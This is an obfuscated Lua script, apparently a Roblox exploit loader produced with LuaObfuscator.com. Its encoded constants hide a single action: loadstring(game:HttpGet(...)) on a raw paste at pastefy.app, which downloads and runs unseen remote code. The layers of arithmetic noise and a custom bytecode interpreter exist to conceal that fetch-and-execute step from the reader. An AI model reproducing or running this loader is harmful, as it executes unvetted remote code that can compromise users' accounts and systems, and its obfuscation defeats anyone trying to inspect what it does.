--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v119=0;local v120;while true do if (v119==1) then return v120;end if (0==v119) then v120=v5(v88,v19);v19=nil;v119=1;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -0 ;local v90;while true do if (v89==(0 -0)) then v90=(v31/((119 -(32 + 85))^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + 1)) ;return v90-(v90%(1 + 0 + 0 + 0)) ;end end else local v91=(570 -(367 + 201))^(v32-(1066 -(68 + 997))) ;return (((v31%(v91 + v91))>=v91) and ((2228 -(892 + 65)) -((538 -312) + 1044))) or (927 -(214 + 713)) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (351 -(87 + (645 -382))) ;v34=181 -(67 + 113) ;end if (v34==(1 + 0)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (7 -5) );v18=v18 + (954 -(802 + 150)) ;return (v37 * (189 + 67)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1187 -(1069 + 118))) then v39,v40,v41,v42=v1(v16,v18,v18 + (6 -3) );v18=v18 + 3 + 1 ;v38=(991 + 7) -((1706 -(368 + 423)) + 82) ;end if (v38==1) then return (v42 * (47505959 -30728743)) + (v41 * ((35807 -24413) + 54142)) + (v40 * (150 + (124 -(10 + 8)))) + v39 ;end end end local function v24() local v43=v23();local v44=v23();local v45=3 -2 ;local v46=(v20(v44,(7 -4) -2 ,49 -29 ) * ((444 -(416 + 26))^(102 -70))) + v43 ;local v47=v20(v44,10 + 11 ,11 + 20 );local v48=((v20(v44,(219 -163) -24 )==(1 -0)) and  -(439 -(145 + 3 + 290))) or (431 -(35 + 9 + (1441 -(87 + 968)))) ;if (v47==((6541 -5055) -(998 + 488))) then if (v46==(0 + 0)) then return v48 * (0 + 0) ;else local v121=0 -0 ;while true do if (v121==(772 -(183 + 18 + 571))) then v47=1 + 0 ;v45=1138 -(116 + 1022) ;break;end end end elseif (v47==2047) then return ((v46==(1747 -(760 + 987))) and (v48 * (((8 -4) -(1416 -(447 + 966)))/(0 + (0 -0))))) or (v48 * NaN) ;end return v8(v48,v47-(1789 -(745 + 21)) ) * (v45 + (v46/(2^(189 -(1954 -(1703 + 114)))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(701 -(376 + 325))) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=1 -0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 + 0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92== #"}") then if (v93== #">") then v94=(function() return v95()~=0 ;end)();elseif (v93==(1638 -(1373 + 263))) then v94=(function() return v96();end)();elseif (v93== #"91(") then v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (v92==(1000 -(451 + 549))) then local v127=(function() return 0;end)();while true do if (0~=v127) then else v93=(function() return v95();end)();v94=(function() return nil;end)();v127=(function() return 1 + 0 ;end)();end if (v127~=1) then else v92=(function() return  #"\\";end)();break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v53=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0 -0 ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do local v118=(function() return 0 -0 ;end)();while true do if (v118==0) then if (v109~=(1385 -(746 + 638))) then else local v128=(function() return 0;end)();while true do if (v128==0) then local v152=(function() return 0;end)();while true do if (v152==(0 + 0)) then while true do if (v100~=0) then else v101=(function() return v102();end)();if (v103(v101, #" ", #"[")==(0 -0)) then local v180=(function() return 341 -(218 + 123) ;end)();local v181=(function() return;end)();local v182=(function() return;end)();local v183=(function() return;end)();while true do if ((1583 -(1535 + 46))==v180) then if (v103(v182, #"]", #"|")== #".") then v183[2 + 0 ]=(function() return v106[v183[2]];end)();end if (v103(v182,2,1 + 1 )~= #"[") then else v183[ #"xnx"]=(function() return v106[v183[ #"gha"]];end)();end v180=(function() return 563 -(306 + 254) ;end)();end if (v180~=(1 + 2)) then else if (v103(v182, #"gha", #"xnx")~= #"|") then else v183[ #"?id="]=(function() return v106[v183[ #".com"]];end)();end v107[v108]=(function() return v183;end)();break;end if (v180==0) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185~=(0 -0)) then else v186=(function() return 1467 -(899 + 568) ;end)();while true do if (v186==0) then v181=(function() return v103(v101,2, #"-19");end)();v182=(function() return v103(v101, #".com",6);end)();v186=(function() return 1;end)();end if (v186~=(1 + 0)) then else v180=(function() return 2 -1 ;end)();break;end end break;end end end if (v180~=1) then else local v187=(function() return 0;end)();while true do if (v187==(603 -(268 + 335))) then v183=(function() return {v104(),v104(),nil,nil};end)();if (v181==0) then local v191=(function() return 290 -(60 + 230) ;end)();local v192=(function() return;end)();while true do if (v191~=(572 -(426 + 146))) then else v192=(function() return 0 + 0 ;end)();while true do if (v192==0) then v183[ #"nil"]=(function() return v104();end)();v183[ #"xnxx"]=(function() return v104();end)();break;end end break;end end elseif (v181== #":") then v183[ #"gha"]=(function() return v105();end)();elseif (v181==(1458 -(282 + 1174))) then v183[ #"gha"]=(function() return v105() -((813 -(569 + 242))^(46 -30)) ;end)();elseif (v181== #"nil") then local v197=(function() return 0 + 0 ;end)();local v198=(function() return;end)();while true do if (v197==0) then v198=(function() return 1024 -(706 + 318) ;end)();while true do if (v198~=0) then else v183[ #"91("]=(function() return v105() -((1253 -(721 + 530))^(1287 -(945 + 326))) ;end)();v183[ #".com"]=(function() return v104();end)();break;end end break;end end end v187=(function() return 2 -1 ;end)();end if (v187==(1 + 0)) then v180=(function() return 702 -(271 + 429) ;end)();break;end end end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end end end if (v109==0) then v100=(function() return 0 + 0 ;end)();v101=(function() return nil;end)();v109=(function() return 1;end)();end break;end end end end;end)();local v54=(function() return function(v110,v111,v112) local v113=(function() return 1500 -(1408 + 92) ;end)();local v114=(function() return;end)();while true do if (v113~=(1086 -(461 + 625))) then else v114=(function() return 1288 -(993 + 295) ;end)();while true do if (0==v114) then local v129=(function() return 0;end)();while true do if (v129==(0 + 0)) then v110[v111-#"." ]=(function() return v112();end)();return v110,v111,v112;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"|",v59 do FlatIdent_69270,Type,Cons,v21,v24,v25,v60,v70=(function() return v52(FlatIdent_69270,Type,Cons,v21,v24,v25,v60,v70);end)();end v58[ #"-19"]=(function() return v21();end)();for v71= #"\\",v23() do FlatIdent_7126A,Descriptor,v21,v20,v22,v23,v60,v55,v71=(function() return v53(FlatIdent_7126A,Descriptor,v21,v20,v22,v23,v60,v55,v71);end)();end for v72= #"[",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1172 -(418 + (1891 -(782 + 356))) ];local v66=v62[1 + 1 ];local v67=v62[3];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=4 -3 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(978 -((820 -(176 + 91)) + 424)) ;local v82={};local v83={};for v115=0 + 0 ,v81 do if (v115>=v75) then v79[v115-v75 ]=v80[v115 + (530 -(406 + 123)) ];else v83[v115]=v80[v115 + (1770 -((4556 -2807) + 20)) ];end end local v84=(v81-v75) + (1 -0) + 0 ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 ];if (v86<=(1325 -(1249 + 73))) then if (v86<=(1 + (1092 -(975 + 117)))) then if ((v86>(0 + 0)) or (1659>=2134)) then v83[v85[2]]=v85[1148 -(466 + 679) ];else local v132=v85[4 -2 ];local v133=v83[v85[7 -4 ]];v83[v132 + (2 -1) ]=v133;v83[v132]=v133[v85[1904 -(106 + 1794) ]];end elseif (v86>(1 + 1)) then do return;end else local v137=v85[1 + 1 ];v83[v137]=v83[v137](v13(v83,v137 + ((1877 -(157 + 1718)) -1) ,v78));end elseif (v86<=((11 + 2) -8)) then if (v86>(118 -(4 + (390 -280)))) then local v139=(0 -0) + (1018 -(697 + 321)) ;local v140;local v141;local v142;local v143;while true do if (((1593 -1008) -(57 + 527))==v139) then v78=(v142 + v140) -(1428 -(41 + (2935 -1549))) ;v143=0 + (0 -0) ;v139=(41 + 64) -(17 + 86) ;end if (v139==2) then for v173=v140,v78 do local v174=(0 -0) + 0 ;while true do if ((v174==(0 -0)) or (3260<2355)) then v143=v143 + 1 ;v83[v173]=v141[v143];break;end end end break;end if (v139==(1130 -(369 + 761))) then v140=v85[5 -(7 -4) ];v141,v142=v76(v83[v140](v13(v83,v140 + 1 + 0 ,v85[169 -(122 + 44) ])));v139=1 -0 ;end end else local v144=0 -0 ;local v145;local v146;local v147;local v148;local v149;while true do if ((v144==(0 + 0)) or (669==4223)) then v145=nil;v146,v147=nil;v148=nil;v149=nil;v83[v85[1 + 1 ]]=v64[v85[1 + (1229 -(322 + 905)) ]];v144=1;end if ((v144==(3 -1)) or (1692<588)) then v149=v85[(678 -(602 + 9)) -(30 + 35) ];v148=v83[v85[3 + 0 ]];v83[v149 + (1258 -(1043 + (1403 -(449 + 740)))) ]=v148;v83[v149]=v148[v85[15 -11 ]];v77=v77 + (1213 -(323 + 889)) ;v144=7 -4 ;end if ((v144==(583 -((1233 -(826 + 46)) + 219))) or (4797<3651)) then v85=v73[v77];v83[v85[5 -3 ]]=v85[3 + (947 -(245 + 702)) ];v77=v77 + ((1014 -693) -(53 + 267)) ;v85=v73[v77];v149=v85[2];v144=4;end if (v144==(5 + 1 + 0)) then v83[v85[1 + 1 ]]();v77=v77 + (414 -(15 + 398)) ;v85=v73[v77];do return;end break;end if (v144==((2881 -(260 + 1638)) -(18 + 964))) then v77=v77 + (3 -2) ;v85=v73[v77];v83[v85[2 + 0 ]]=v64[v85[2 + 1 ]];v77=v77 + (1 -(440 -(382 + 58))) ;v85=v73[v77];v144=852 -(20 + 830) ;end if (v144==((12 -8) + 0)) then v146,v147=v76(v83[v149](v13(v83,v149 + (127 -(97 + 19 + 10)) ,v85[3])));v78=(v147 + v149) -(1 + 0) ;v145=738 -(542 + 196) ;for v175=v149,v78 do v145=v145 + (1 -0) ;v83[v175]=v146[v145];end v77=v77 + 1 + 0 ;v144=3 + 2 ;end if (v144==(2 + 3)) then v85=v73[v77];v149=v85[4 -2 ];v83[v149]=v83[v149](v13(v83,v149 + 1 + 0 ,v78));v77=v77 + (1126 -(936 + 189)) ;v85=v73[v77];v144=6;end end end elseif (v86==((30 -15) -9)) then v83[v85[(4615 -3062) -(1126 + 425) ]]=v64[v85[408 -(118 + (1492 -(902 + 303))) ]];else v83[v85[7 -5 ]]();end v77=v77 + (1122 -(118 + 1003)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F755A56394F5955542F72617700083Q0012043Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
